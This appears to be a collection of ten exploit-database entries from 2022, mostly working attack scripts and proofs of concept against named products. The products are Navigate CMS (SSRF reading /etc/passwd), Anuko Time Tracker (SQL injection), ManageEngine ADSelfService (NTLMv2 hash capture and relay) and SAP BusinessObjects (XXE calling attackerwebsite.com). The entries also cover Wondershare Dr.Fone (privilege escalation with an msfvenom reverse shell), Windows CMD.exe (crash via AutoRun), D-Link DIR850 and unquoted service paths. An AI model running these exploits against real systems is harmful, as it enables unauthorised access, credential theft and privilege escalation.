<pre><code>#!/usr/bin/env python3<br /># Exploit Title: Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated)<br /># Exploit Author: cheshireca7<br /># Vendor Homepage: https://www.navigatecms.com/<br /># Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.9.4r1561.zip/download<br /># Version: 2.9.4 and earlier<br /># Tested on: Ubuntu 20.04<br /># CVE: CVE-2022-28117<br />#<br /># -*- coding: utf-8 -*-<br /><br />import requests as r, signal<br />from emoji import emojize<br />from argparse import ArgumentParser<br />from sys import exit<br />from requests_toolbelt.multipart.encoder import MultipartEncoder<br />from hashlib import md5<br />from time import sleep<br />from base64 import b64decode,b64encode<br />from colorama import Fore, Style<br /><br />#proxies = {'http':'http://127.0.0.1:8080'}<br /><br />def handler(signum, frame):<br /> print("["+Fore.YELLOW+"!"+Style.RESET_ALL+"] "+emojize(b64decode("T2gsIHlvdSBjYW7igJl0IGhlbHAgdGhhdCwgd2UncmUgYWxsIG1hZCBoZXJlIC4uLiA6cGF3X3ByaW50czoK").decode('UTF-8')))<br /> exit()<br /><br />def login():<br /> print("["+Fore.BLUE+"*"+Style.RESET_ALL+f"] Trying to authenticate as {args.username} ...")<br /> sleep(1)<br /><br /> try:<br /> # Grabbing CSRF Token<br /> s = r.Session()<br /> resp = s.get(f"{args.target}/login.php")#, proxies=proxies)<br /> csrf_token = resp.headers['X-Csrf-Token']<br /><br /> # Performing login<br /> data = MultipartEncoder(fields={'login-username':f"{args.username}",'csrf_token':f"{csrf_token}",'login-password':f"{args.password}"})<br /> headers = {'Content-Type':data.content_type}<br /> resp = s.post(f"{args.target}/login.php", data=data, headers=headers, allow_redirects=False)#, proxies=proxies)<br /> except:<br /> print("["+Fore.RED+"!"+Style.RESET_ALL+"] Something went wrong performing log in")<br /> exit(-1)<br /> if resp.status_code == 302:<br /> print("["+Fore.GREEN+"+"+Style.RESET_ALL+"] Login successful!")<br /> for cookie in resp.cookies:<br /> if "NVSID" in cookie.name:<br /> return (resp.headers['X-Csrf-Token'],f"{cookie.name}={cookie.value}")<br /> else:<br /> print("["+Fore.RED+"!"+Style.RESET_ALL+f"] Incorrect {args.username}'s credentials")<br /> exit(-1)<br /><br />def exploit(values):<br /> print("["+Fore.BLUE+"*"+Style.RESET_ALL+"] Performing SSRF ...")<br /> sleep(1)<br /> <br /> # Abusing cache feature to retrieve response <br /> data = {'limit':'5','language':'en','url':f'{args.payload}'}<br /> headers = {'X-Csrf-Token':values[0]}<br /> cookies = {values[1].split('=')[0]:values[1].split('=')[1]}<br /> resp = r.post(f"{args.target}/navigate.php?fid=dashboard&act=json&oper=feed", cookies=cookies, headers=headers, data=data)#, proxies=proxies)<br /><br /> # Retrieving the file with response from static route<br /> md5File = md5(f"{args.payload}".encode('UTF-8')).hexdigest()<br /> resp = r.get(f"{args.target}/private/1/cache/{md5File}.feed",cookies=cookies)#,proxies=proxies)<br /> if len(resp.text) > 0:<br /> print("["+Fore.GREEN+"+"+Style.RESET_ALL+"] Dumping content ...")<br /> sleep(1)<br /> print(f"\n{resp.text}")<br /> exit(0)<br /> else:<br /> print("["+Fore.RED+"!"+Style.RESET_ALL+"] No response received")<br /> exit(-1)<br /><br />if __name__ == '__main__':<br /><br /> # Define parameters <br /> signal.signal(signal.SIGINT, handler)<br /> parser = ArgumentParser(description='CVE-2022-28117: Navigate CMS <= 2.9.4 - Server-Side Request Forgery (Authenticated)')<br /> parser.add_argument('-x', '--payload',default='file:///etc/passwd', help='URL to be requested (default=file:///etc/passwd)')<br /> parser.add_argument('-u','--username', default='admin', help='Username to log in the CMS (default=admin)')<br /> parser.add_argument('-p','--password', required=True, help='Password to log in the CMS')<br /> parser.add_argument('target', help='URL where the CMS is hosted. Ex: http://example.com[:80]/navigate')<br /> args = parser.parse_args()<br /><br /> exploit(login())<br /> <br /></code></pre>
<pre><code># Exploit Title: Anuko Time Tracker - SQLi (Authenticated)<br /># Date: 2022-05-03<br /># Exploit Author: Altelus<br /># Vendor Homepage: https://www.anuko.com/<br /># Software Link: https://github.com/anuko/timetracker/tree/0924ef499c2b0833a20c2d180b04fa70c6484b6d<br /># Version: Anuko Time Tracker 1.20.0.5640<br /># Tested on: Linux<br /># CVE : CVE-2022-24707<br /><br /># An authenticated user can exploit an SQL Injection vulnerability on the Puncher plugin if its enabled.<br /># User has to start the puncher and stop it but upon stopping an additional parameter 'date' must be passed.<br /># The 'date' parameter is then injected with SQL payload for leaking database contents.<br /><br /><br />from time import time<br />import requests<br />import argparse<br />import re<br />from bs4 import BeautifulSoup<br />from datetime import datetime, timedelta<br /><br /><br /><br /><br />def get_puncher_page():<br /><br /> punch_txt = r_client.get(host + "/puncher.php").text<br /><br /> if "Feature is disabled" in punch_txt:<br /> print("[-] Puncher feature is disabled.")<br /> exit(0)<br /><br /> print("[+] Puncher feature is enabled. Picking a project...")<br /><br /> soup = BeautifulSoup(punch_txt, features="lxml")<br /> time_record_form = soup.find("select", {"name" : "project", "id" : "project"})<br /><br /> project_list = time_record_form.findAll("option")<br /><br /> if len(project_list) <= 1:<br /> print("[-] No project to choose from")<br /> exit(0)<br /><br /> f_proj = project_list[1]<br /><br /> print("[*] Picking the first project in the option: [{} - {}]".format(f_proj['value'], f_proj.text))<br /><br /> return f_proj['value']<br /><br /><br />def login(username, password):<br /><br /> global r_client<br /><br /> data = {<br /> "login" : username,<br /> "password" : password,<br /> "btn_login" : "Login",<br /> }<br /><br /><br /> login_txt = r_client.post(host + "/login.php", data=data).text<br /> if "Incorrect" in login_txt:<br /> print("[-] Failed to login. Credentials are not correct.")<br /> exit(0)<br /><br /> print("[+] Login successful!")<br /><br /><br />def start_puncher(project_id):<br /><br /> global r_client<br /> <br /> data = {<br /> "project": project_id,<br /> "btn_start": "Start",<br /> "browser_today" : "",<br /> "browser_time" : "04:00",<br /> "date": "{}-{}-{}".format(date.year, date.month, date.day)<br /> }<br /><br /><br /> headers = {<br /> "Referer" : host + "/puncher.php"<br /> }<br /><br /> start_p = r_client.post(host + "/puncher.php", data=data, headers=headers).text<br /><br /> if "Uncompleted entry already" in start_p:<br /> print("[-] A running puncher entry is seen. Exiting")<br /> exit(0)<br /> <br /> print("[*] Puncher started. Getting id added...")<br /><br /> puncher_p = r_client.get(host + "/puncher.php?date={}-{}-{}".format(date.year, date.month, date.day)).text<br /><br /> time_edit_ids = re.findall("time_edit.php\?id=\d+",puncher_p)<br /> time_edit_ids.sort()<br /><br /> latest_id = time_edit_ids[-1].split("=")[1]<br /><br /> return latest_id<br /><br /><br />def stop_puncher_sqli(project_id, sqli=""):<br /> <br /> get_all_tables = "SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()"<br /><br /> if sqli == "":<br /> sqli = get_all_tables<br /><br /> new_date = date+timedelta(minutes=10)<br /><br /> data = {<br /> "btn_stop": "Stop",<br /> "browser_today" : "",<br /> "browser_time" : "04:10",<br /> "date": "{}-{}-{}', comment=(({})), date='{}-{}-{}".format(date.year, date.month, date.day, sqli, date.year, date.month, date.day)<br /> }<br /><br /> headers = {<br /> "Referer" : host + "/puncher.php"<br /> }<br /><br /> stop_p = r_client.post(host + "/puncher.php", data=data, headers=headers,allow_redirects=False).text<br /><br /> print("[*] Puncher stopped")<br /><br />def get_puncher_result(puncher_id):<br /> <br /> time_edit_p = r_client.get(host + "/time_edit.php?id={}".format(puncher_id)).text<br /><br /> soup = BeautifulSoup(time_edit_p, features="lxml")<br /> note_content = soup.find("textarea", {"name" : "note", "id" : "note"})<br /><br /> print("[+] Leaked: {}".format(note_content.text))<br /><br /><br />def delete_puncher_entry(puncher_id):<br /> <br /> data = {<br /> "delete_button" : "Delete",<br /> "id" : puncher_id<br /> }<br /><br /> headers = {<br /> "Referer" : "http://10.0.2.15/time_delete.php?id={}".format(puncher_id)<br /> }<br /><br /> del_p = r_client.post(host + "/time_delete.php?id={}".format(puncher_id), data=data, headers=headers)<br /><br /> print("[*] Puncher {} deleted".format(puncher_id))<br /><br /><br />parser = argparse.ArgumentParser()<br /><br />parser.add_argument('--username', required=True, help="Anuko Timetracker username")<br />parser.add_argument('--password', required=True, help="Anuko Timetracker password")<br />parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")<br />parser.add_argument('--sqli', required=False, help="SQL query to run. Defaults to getting all tables")<br />args = parser.parse_args()<br /><br />r_client = requests.Session()<br />host = args.host<br />date = datetime.now()<br /><br />username = args.username<br />password = args.password<br /><br />login(username, password)<br />proj_id = get_puncher_page()<br />puncher_id = start_puncher(proj_id)<br /><br />sqli=""<br /><br />if args.sqli != None:<br /> sqli = args.sqli<br /><br />stop_puncher_sqli(proj_id, sqli=sqli)<br />get_puncher_result(puncher_id)<br />delete_puncher_entry(puncher_id)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path<br /># Discovery by: Edgar Carrillo Egea // https://twitter.com/ecarrilloeg<br /># Discovery Date: 2022-04-24<br /># Vendor Homepage: https://www.zte.com.cn/global/<br /># Tested Version: 2.0.3.0<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Microsoft Windows 10 Pro x64<br /><br /># Step to discover Unquoted Service Path:<br /><br />C:\Users\edgar>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br />UDisk Monitor Z5 Phone UDisk Monitor Z5 Phone C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe Auto<br /><br />C:\Users\edgar>sc qc "UDisk Monitor Z5 Phone"<br />[SC] QueryServiceConfig CORRECTO<br /><br />NOMBRE_SERVICIO: UDisk Monitor Z5 Phone<br /> TIPO : 110 WIN32_OWN_PROCESS (interactive)<br /> TIPO_INICIO : 2 AUTO_START<br /> CONTROL_ERROR : 1 NORMAL<br /> NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe<br /> GRUPO_ORDEN_CARGA :<br /> ETIQUETA : 0<br /> NOMBRE_MOSTRAR : UDisk Monitor Z5 Phone<br /> DEPENDENCIAS :<br /> NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br />C:\Users\edgar>systeminfo<br /><br />Nombre de host: DESKTOP-810865D<br />Nombre del sistema operativo: Microsoft Windows 10 Pro<br />Versión del sistema operativo: 10.0.19044 N/D Compilación 19044<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: TCQ - 'ITeCProteccioAppServer.exe' Unquoted Service Path<br /># Discovery by: Edgar Carrillo Egea - https://twitter.com/ecarrilloeg<br /># Discovery Date: 2022-04-25<br /># Vendor Homepage: https://itec.es/programas/<br /># Vulnerability Type: Unquoted Service Path Privilege Escalation<br /># Tested on OS: Microsoft Windows 11 Home<br /><br />To properly exploit this vulnerability,<br />the local attacker must insert an executable file in the path of the service.<br />Upon service restart or system reboot, the malicious code will be run<br />with elevated privileges.<br /> <br /><br />C:\Users\edgar>sc qc "ITeCProteccioAppServer"<br />[SC] QueryServiceConfig CORRECTO<br /><br />NOMBRE_SERVICIO: ITeCProteccioAppServer<br /> TIPO : 110 WIN32_OWN_PROCESS (interactive)<br /> TIPO_INICIO : 2 AUTO_START<br /> CONTROL_ERROR : 1 NORMAL<br /> NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ITeC\LIC\ITeCProteccioAppServer.exe<br /> GRUPO_ORDEN_CARGA :<br /> ETIQUETA : 0<br /> NOMBRE_MOSTRAR : ITeCProteccioAppServer<br /> DEPENDENCIAS : RPCSS<br /> NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br />C:\Users\edgar>systeminfo<br /><br />Nombre de host: DESKTOP-0DL5SID<br />Nombre del sistema operativo: Microsoft Windows 11 Home<br />Versión del sistema operativo: 10.0.22000 N/D Compilación 22000<br /><br /></code></pre>
<pre><code># Exploit Title: ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure<br /># Exploit Author: Metin Yunus Kandemir<br /># Vendor Homepage: https://www.manageengine.com/<br /># Software Link: https://www.manageengine.com/products/self-service-password/download.html<br /># Details: https://docs.unsafe-inline.com/0day/multiple-manageengine-applications-critical-information-disclosure-vulnerability<br /># Version: ADSelfService Plus Build < 6121<br /># Tested against: Build 6118<br /># CVE: CVE-2022-29457<br /><br /># !/usr/bin/python3<br />import argparse<br />import requests<br />import urllib3<br />import random<br />import sys<br /><br />"""<br />1- <br />a)Set up SMB server to capture NTMLv2 hash.<br />python3 smbserver.py share . -smb2support<br /><br />b)For relaying to SMB:<br />python3 ntlmrelayx.py -smb2support -t smb://TARGET<br /><br />c)For relaying to LDAP:<br />python3 ntlmrelayx.py -t ldaps://TARGET<br /><br />2- Fire up the exploit.<br />You will obtain the NTLMv2 hash of user/computer account that runs the ADSelfService in five minutes.<br />"""<br /><br />urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br /><br />def get_args():<br /> parser = argparse.ArgumentParser(<br /> epilog="Example: exploit.py -t https://Target/ -l Listener-IP -a adselfservice -d unsafe.local -u operator1 -p operator1")<br /> parser.add_argument('-d', '--domain', required=True, action='store', help='DNS name of the target domain. ')<br /> parser.add_argument('-a', '--auth', required=True, action='store', help='If you have credentials of the application user, type adselfservice. If you have credentials of the domain user, type domain')<br /> parser.add_argument('-u', '--user', required=True, action='store')<br /> parser.add_argument('-p', '--password', required=True, action='store')<br /> parser.add_argument('-t', '--target', required=True, action='store', help='Target url')<br /> parser.add_argument('-l', '--listener', required=True, action='store', help='Listener IP to capture NTLMv2 hash')<br /> args = parser.parse_args()<br /> return args<br /><br /><br />def scheduler(domain, auth, target, listener, user, password):<br /> try:<br /> with requests.Session() as s:<br /> gUrl = target<br /> getCsrf = s.get(url=gUrl, allow_redirects=False, verify=False)<br /> csrf = getCsrf.cookies['_zcsr_tmp']<br /> print("[*] Csrf token: %s" % getCsrf.cookies['_zcsr_tmp'])<br /> <br /> if auth.lower() == 'adselfservice':<br /> auth = "ADSelfService Plus Authentication"<br /> data = {<br /> "loginName": user,<br /> "domainName": auth,<br /> "j_username": user,<br /> "j_password": password,<br /> "AUTHRULE_NAME": "ADAuthenticator",<br /> "adscsrf": [csrf, csrf]<br /> }<br /><br /> #Login<br /> url = target + "j_security_check"<br /> headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"}<br /> req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False)<br /> #Auth Check<br /> url2 = target + "webclient/index.html"<br /> req2 = s.get(url2, headers=headers, allow_redirects=False, verify=False)<br /> if req2.status_code == 200:<br /> print("[+] Authentication is successful.")<br /> elif req2.status_code == 302:<br /> print("[-] Login failed.")<br /> sys.exit(1)<br /> else:<br /> print("[-] Something went wrong")<br /> sys.exit(1)<br /> <br /> dn = domain.split(".")<br /> r1 = random.randint(1, 1000)<br /> <br /> surl = target + 'ServletAPI/Reports/saveReportScheduler'<br /> data = {<br /> 'SCHEDULE_ID':'0',<br /> 'ADMIN_STATUS':'3',<br /> 'SCHEDULE_NAME': 'enrollment' + str(r1),<br /> 'DOMAINS': '["'+ domain +'"]',<br /> 'DOMAIN_PROPS': '{"'+ domain +'":{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","DOMAIN_SELECTED_OUS_GROUPS":{"ou":[{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","NAME":"'+ domain +'"}]}}}',<br /> 'SELECTED_REPORTS': '104,105',<br /> 'SELECTED_REPORT_LIST': '[{"REPORT_CATEGORY_ID":"3","REPORT_LIST":[{"CATEGORY_ID":"3","REPORT_NAME":"adssp.reports.enroll_rep.enroll.heading","IS_EDIT":false,"SCHEDULE_ELEMENTS":[],"REPORT_ID":"104"},{"CATEGORY_ID":"3","REPORT_NAME":"adssp.common.text.non_enrolled_users","IS_EDIT":true,"SCHEDULE_ELEMENTS":[{"DEFAULT_VALUE":false,"size":"1","ELEMENT_VALUE":false,"uiText":"adssp_reports_enroll_rep_non_enroll_show_notified","name":"SHOW_NOTIFIED","id":"SHOW_NOTIFIED","TYPE":"checkbox","class":"grayfont fntFamily fntSize"}],"REPORT_ID":"105"}],"REPORT_CATEGORY_NAME":"adssp.xml.reportscategory.enrollment_reports"}]',<br /> 'SCHEDULE_TYPE': 'hourly',<br /> 'TIME_OF_DAY': '0',<br /> 'MINS_OF_HOUR': '5',<br /> 'EMAIL_ID': user +'@'+ domain,<br /> 'NOTIFY_ADMIN': 'true',<br /> 'NOTIFY_MANAGER': 'false',<br /> 'STORAGE_PATH': '\\\\' + listener + '\\share',<br /> 'FILE_FORMAT': 'HTML',<br /> 'ATTACHMENT_TYPE': 'FILE',<br /> 'ADMIN_MAIL_PRIORITY': 'Medium',<br /> 'ADMIN_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_sub',<br /> 'ADMIN_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_msg_html',<br /> 'MANAGER_FILE_FORMAT': 'HTML',<br /> 'MANAGER_ATTACHMENT_TYPE': 'FILE',<br /> 'MANAGER_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_mgr_sub',<br /> 'MANAGER_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_mgr_msg_html',<br /> 'adscsrf': csrf<br /> }<br /> sch = s.post(surl, data=data, headers=headers, allow_redirects=False, verify=False)<br /> if 'adssp.reports.schedule_reports.storage_path.unc_storage_path' in sch.text:<br /> print('[-] The target is patched!')<br /> sys.exit(1)<br /> if sch.status_code == 200:<br /> print("[+] The report is scheduled. The NTLMv2 hash will be captured in five minutes!")<br /> else:<br /> print("[-] Something went wrong. Please, try it manually!")<br /> sys.exit(1)<br /> except:<br /> print('[-] Connection error!')<br /> <br />def main():<br /> arg = get_args()<br /> domain = arg.domain<br /> auth = arg.auth<br /> user = arg.user<br /> password = arg.password<br /> target = arg.target<br /> listener = arg.listener<br /> scheduler(domain, auth, target, listener, user, password)<br /><br /><br />if __name__ == "__main__":<br /> main()<br /> <br /></code></pre>
<pre><code>Hi @ll,<br /><br />the subject says it all: a 25 year old TRIVIAL signed integer<br />arithmetic bug (which may well have earned a PhD now) crashes<br />Windows' command interpreter CMD.exe via its builtin SET command.<br />See their documentation:<br /><https://technet.microsoft.com/en-us/library/cc771320.aspx><br /><https://technet.microsoft.com/en-us/library/cc754250.aspx><br /><br /><br />Classification<br />~~~~~~~~~~~~~~<br /><br /><https://cwe.mitre.org/data/definitions/190.html><br />CWE-190: Integer Overflow or Wraparound<br /><br /><https://cwe.mitre.org/data/definitions/248.html><br />CWE-248: Uncaught Exception<br /><br /><br />Demonstration<br />~~~~~~~~~~~~~<br /><br />On Windows NT4 or any newer version start the command interpreter and<br />run the following 4 command lines (the first 3 set just the base):<br /><br />SET /A -2147483648<br />SET /A ~2147483647<br />SET /A ~2147483647 / -1<br />SET /A ~2147483647 % -1<br /><br />[1] Oops: although a valid signed 32-bit integer, the command interpreter<br /> reports the literal value -2147483648 = 2**31 alias INT_MIN as<br /> "Invalid number. Numbers are limited to 32-bits of precision."<br /><br />[2] As expected, ~2147483647, the negation of INT_MAX, yields INT_MIN<br /><br />[3] Also as expected, computing the quotient of INT_MIN / -1 produces<br /> "Invalid number. Numbers are limited to 32-bits of precision.": the<br /> correct result is +2147483648 alias INT_MAX + 1, i.e. produces a<br /> integer overflow, which raises a #DE (divide error) exception on<br /> x86/x64 processors (and their 8- and 16-bit predecessors too).<br /><br />[4] OUCH: rather unexpected, computing the remainder of INT_MIN / -1<br /> crashes the command processor with the #DE exception, i.e.<br /> the developers failed to implement the check they used for<br /> division.<br /><br />JFTR: the remainder of <any integer> % -1 as well as <any integer> % 1<br /> is (by the algebraic definition of division) 0 (in words: ZERO):<br /> the remainder is in magnitude less than the divisor.<br /> The only integer that is in magnitude less than |-1| = 1 is 0!<br /><br /><br />Exploit<br />~~~~~~~<br /><br />Setting one or both of the following documented registry entries<br />crashes the command interpreter upon invocation (unless started<br />with the switch /D):<br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Command Processor]<br />"AutoRun"="SET /A ~2147483647 % ~0"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]<br />"AutoRun"="SET /A ~2147483647 % ~0"<br /><br /><br />stay tuned<br />Stefan Kanthak<br /><br />PS: I reported this bug as DoS to the MSRC; they replied with the<br /> following bullshit statement in their 2nd sentence:<br /><br />| Though engineering confirmed the crash in this case, it was assessed<br />| as a Low severity DoS.<br />| Their reasoning centers around the requirement to have admin<br />| privileges to pull off the attack.<br /><br /> OUCH! Unprivileged users can but write this registry entry below<br /> [HKEY_CURRENT_USER\Software\Microsoft\Command Processor]<br /><br /></code></pre>
<pre><code># Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)<br /># Google Dork: N/A<br /># Date: 4/21/2022<br /># Exploit Author: West Shepherd<br /># Vendor Homepage: https://www.sap.com/<br /># Software Link: https://www.sap.com/<br /># Version: 4.2 and 4.3<br /># Tested on: Windows Server 2019 x64<br /># CVE : CVE-2022-28213<br /># References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md<br /><br />curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \<br />--data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY %<br />remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \<br />https://example.com/biprws/logon/long<br /><br /></code></pre>
<pre><code># Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions<br /># Date: 04/25/2022<br /># Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)<br /># Vendor Homepage: https://drfone.wondershare.com/<br /># Software Link: https://download.wondershare.com/drfone_full3360.exe<br /># Version: 11.4.10<br /># Tested on: Windows 10 64-bit<br /><br /> # Note: The application folder "Wondershare Dr.Fone" may be different (e.g it will be "drfone" if we download the installer from the italian website)<br /><br /> # Description:<br /> The application "Wondershare Dr. Fone" comes with 3 services: <br /> 1. DFWSIDService<br /> 2. ElevationService<br /> 3. Wondershare InstallAssist<br /><br /> All the folders that contain the binaries for the services have weak permissions.<br /> These weak permissions allow any authenticated user to get SYSTEM privileges.<br /><br /> First, we need to check if services are running using the following command:<br /> wmic service get name,displayname,pathname,startmode,startname,state | findstr /I wondershare<br /><br /> Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto LocalSystem Running <br /> Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps\ElevationService.exe Auto LocalSystem Running <br /> Wondershare Install Assist Service Wondershare InstallAssist C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto LocalSystem Running <br /><br /> Now we need to check if we have enough privileges to replace the binaries:<br /><br /> icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone"<br /> Everyone:(OI)(CI)(F) <= the first row tells us that Everyone has Full Access (F) on files (OI = Object Inherit) and folders (CI = Container Inherit)<br /> ...<br /><br /> icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps"<br /> Everyone:(I)(OI)(CI)(F) <= same here<br /> ...<br /><br /> icacls "C:\ProgramData\Wondershare\Service"<br /> Everyone:(I)(OI)(CI)(F) <= and here<br /> ...<br /><br /><br /># Proof of Concept:<br />1. Create an exe file with the name of the binary we want to replace (e.g. WsidService.exe if we want to exploit the service "Wondershare WSID help") <br />2. Put it in the folder (e.g. C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\)<br />3. After replacing the binary, wait the next reboot (unless the service can be restarted manually)<br /><br />As a proof of concept we can generate a simple reverse shell using msfvenom, and use netcat as the listener:<br />simple payload: msfvenom --payload windows/shell_reverse_tcp LHOST=<YOUR_IP_ADDRESS> LPORT=<YOUR_PORT> -f exe > WsidService.exe<br />listener: nc -nlvp <YOUR_PORT><br /><br /><br /></code></pre>
<pre><code># Exploit Title: DLINK DIR850 - Insecure Access Control<br /># Product: Dlink<br /># Model: DIR850<br /># Date: 14/1/2022<br /># CVE : CVE-2021-46378<br /># Exploit Author: Ahmed Alroky<br /># Hardware version: b1<br /># Firmware version: ET850-1.08TRb03<br /># Vendor home page: https://www.dlink.com/<br /><br /># Exploit : <br />Visit http://<IP Address>/config.dat<br /><br /></code></pre>
<pre><code># Exploit Title: DLINK DIR850 - Open Redirect<br /># Product: Dlink<br /># Model: DIR850<br /># Date: 14/1/2022<br /># CVE: CVE-2021-46379<br /># Exploit Author: AhmedAlroky<br /># Hardware version: b1<br /># Firmware version: ET850-1.08TRb03<br /># Vendor home page: https://www.dlink.com/<br /><br />#Exploit : <br />Visit http://<IP Address>/boafrm/formWlanRedirect?redirect-url=http://attacker.com&wlan_id=1<br /> <br /><br /></code></pre>